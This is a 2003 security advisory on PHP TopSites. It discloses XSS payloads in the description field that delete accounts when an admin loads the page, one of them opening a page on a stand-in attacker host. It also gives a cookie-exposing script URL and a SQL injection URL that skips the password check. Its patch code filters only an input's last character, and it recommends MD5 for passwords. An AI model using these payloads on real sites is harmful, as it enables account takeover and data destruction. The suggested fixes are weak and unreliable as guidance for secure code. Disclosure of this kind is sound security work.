Multiple PHP Topsites Vulnerabities found

PHP TopSites is a PHP/MySQL-based customizable TopList script. Main

features include: Easy configuration config file; MySQL database backend;

unlimited categories, Site rating on incoming votes; Special Rating from

Webmaster; anti-cheating gateway; Random link; Lost password function;

Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-

Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.

http://www.itop10.net/products/

The thousands of sites that use PHP Topsites are strongly advised to

upgrade, fix or discard their phptopsites scripts.

Vulnerability 1.

Critical XSS Vulnerability in all versions of PHP TopSites

Version: All

Script: Add.php

Because PHP TopSites does not have session authentication, it allows an

attacker to use an XSS vulnerability to do things like delete, edit, and

change user accounts by having an unknowing admin run the code. By putting

the following in the description field when adding a new website to any

particular topsite, it's almost impossible for any admin not to run the

following code (unless they have customized browser security settings).

The following code is executed when the admin loads the page. He has to

do nothing but load the page in order to validate a site and the integrity

of the database can be destroyed as the code is never parsed out of the

field and the page does not display it, it executes it. Below are a few

examples - placed into the description field when adding a new site.

<body

onLoad= "parent.location='http://www.somewebsite.com/TopSitesdirectory/sedi

tor.php?sid=siteidnumber&a=delete'">

This code will effectively delete the user account with the site id number

as soon as the admin loads the page.

<body onLoad="window.open('http://attackerswebsite/launcher.htm')">

Using this code, an attacker can open a popup window to a page on his site

that contains code for several more popup windows. Each window can be

used to delete a site from the PHP TopSites database. This method can

totally erase a TopSites database as soon as the admin loads the page.

To fix this vulnerability open add.php and find:

if (!$name) { $err.= "Please enter your name.<BR>"; }

if (!$passw) { $err.= "Please enter password.<BR>"; }

if (!$email) { $err.= "Please enter your email address.<BR>"; }

if (!$title) { $err.= "Please enter site title.<BR>"; }

if (!$url) { $err.= "Please enter site url.<BR>"; }

if (!$banner_w) { $err.= "Please enter banner width.<BR>"; }

if (!$banner_h) { $err.= "Please enter banner height.<BR>"; }

if (!$description) { $err.= "Please enter site description.<BR>"; }

if (!$category) { $err.= "Please enter site category.<BR>"; }

if (check_email_addr($email) == 0) { $err.= "Please enter valid email

address.<BR>"; }

Below it paste:

////////////////////////////////////////////////////////////////////////
///

////////////////////////

// Critical XSS Vuln Fix By JeiAr = (jeiar (at) kmfms (dot) com [email concealed]) January 12 2003 -

All Versions PHP Topsites //

////////////////////////////////////////////////////////////////////////
///

////////////////////////

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $name)) {$err.= "Please enter A

valid Name.<BR>";}

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $passw)) {$err.= "Please enter A

valid Password<BR>";}

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $title)) {$err.= "Please enter A

valid Title<BR>";}

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $linkback)) {$err.= "Please enter A

valid Linkback<BR>";}

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $url)) {$err.= "Please enter A

valid URL<BR>";}

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_url)) {$err.= "Please enter

A valid Banner URL<BR>";}

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_w)) {$err.= "Please enter A

valid Banner Width<BR>";}

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $banner_h)) {$err.= "Please enter A

valid Banner Height<BR>";}

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $description)) {$err.= "Please

enter A valid Description<BR>";}

if (ereg('[-!#$%&\'*+\\.><=?^_`{|}]$', $category)) {$err.= "Please enter A

valid Category<BR>";}

////////////////////////////////////////////////////////////////////////
///

/////////////////////////

Vulnerability 2.

XSS Vulnerability in all versions of PHP TopSites

Version: All

Script: help.php

Because PHP TopSites does not have session authentication, it allows an

attacker to use an XSS vulnerability steal cookies or other user-supplied

information. The page being generated with unvalidated input from

untrustworthy sources causes this vulnerability. The developer is urged to

implement session authentication into this script. The following example

lies in the help.php file.

http://somewebsitesite/TopSitesdirectory/help.php?sid=<script>aler
t

(document.cookie)</script>

Vulnerability 3.

Plaintext Password Disclosure Vulnerability in all versions of PHP

TopSites

Version: All

Script: seditor.php

No current versions of PHP TopSites encrypt user passwords, and these

plaintext passwords can be viewed by anyone with access to the admin panel

or edit.php page. Any Topsite Admin (or intruder) can possibly use the

user supplied password to try and compromise the security of the user

supplied website and or the user supplied email account. So anyone signing

up for a TopList using PHP TopSites should keep this in mind, and it

should also be noted to anyone using the same password for everything,

that this is generally not a very good habit to have. This vulnerability

affects all versions. A suggestion to the developer would be to crypt the

passes via md5, and not allow the password to be displayed to an admin

when editing a TopList user(s).

Vulnerability 4.

PHP TopSites User Account Compromise Vulnerability in All Pro versions and

in 1.xx Free versions

Version: All Pro Versions and Free Versions 1.xx

Script:edit.php

This is exploitable because of two conditions in the PHP/MYSQL

configuration. Firstly, register_globals parameter is on in php.ini, which

automatically turns every variable into a global variable. Secondly, the

underlying database is MYSQL, which does not require numeric criteria in

the SQL statement to be quoted. This allows an attacker to bypass the

magic_quoted_gpcs protection in PHP manipulating numeric parts of a query.

It is possible for an attacker to use SQL injection to expose all user

account details for any user he or she knows the id number of. All site ID

numbers of a particular Top List are made available on the index.php page.

The vulnerable code resides

in edit.php. Examples are listed below.

http://examplewebsite.com/topsitesdirectory/edit.php?

a=pre&submit=&sid=siteidnumber--

This injection negates the use of a password and provides access to the

TopList edit page. All information about a particular site can be viewed

and edited from this page. One thing to note, the password is displayed

as plaintext on this page also. All users of the 1.XX Free script(s) are

urged to upgrade their scripts as soon as possible. If you are not able to

upgrade, the below code should serve as a quick fix.

In the Edit.php file change:

$query = mysql_db_query ($dbname,"Select * from top_user Where sid=$sid

AND password='$passw'",$db) or die (mysql_error());

to:

$query = mysql_db_query ($dbname,"Select * from top_user Where

sid='$sid'AND password='$passw'",$db) or die (mysql_error());

In conclusion, the vulnerabilities in this script make it very easy for an

attacker to exploit. The vulnerabilities present in this script compromise

the security of user accounts, the integrity of the data in the database,

and the security of the server it is hosted on. All administrators that

are currently using this script in their websites are strongly urged to

patch or upgrade the PHP TopSites script. Some versions, such as the Pro

version, have no developer upgrades or patches available at the time of

this writing, so they are still vulnerable to the attacks mentioned above.

All Credits go to the CyberArmy Application and Code Auditing Team and

CyberArmy Security Research

[ reply ]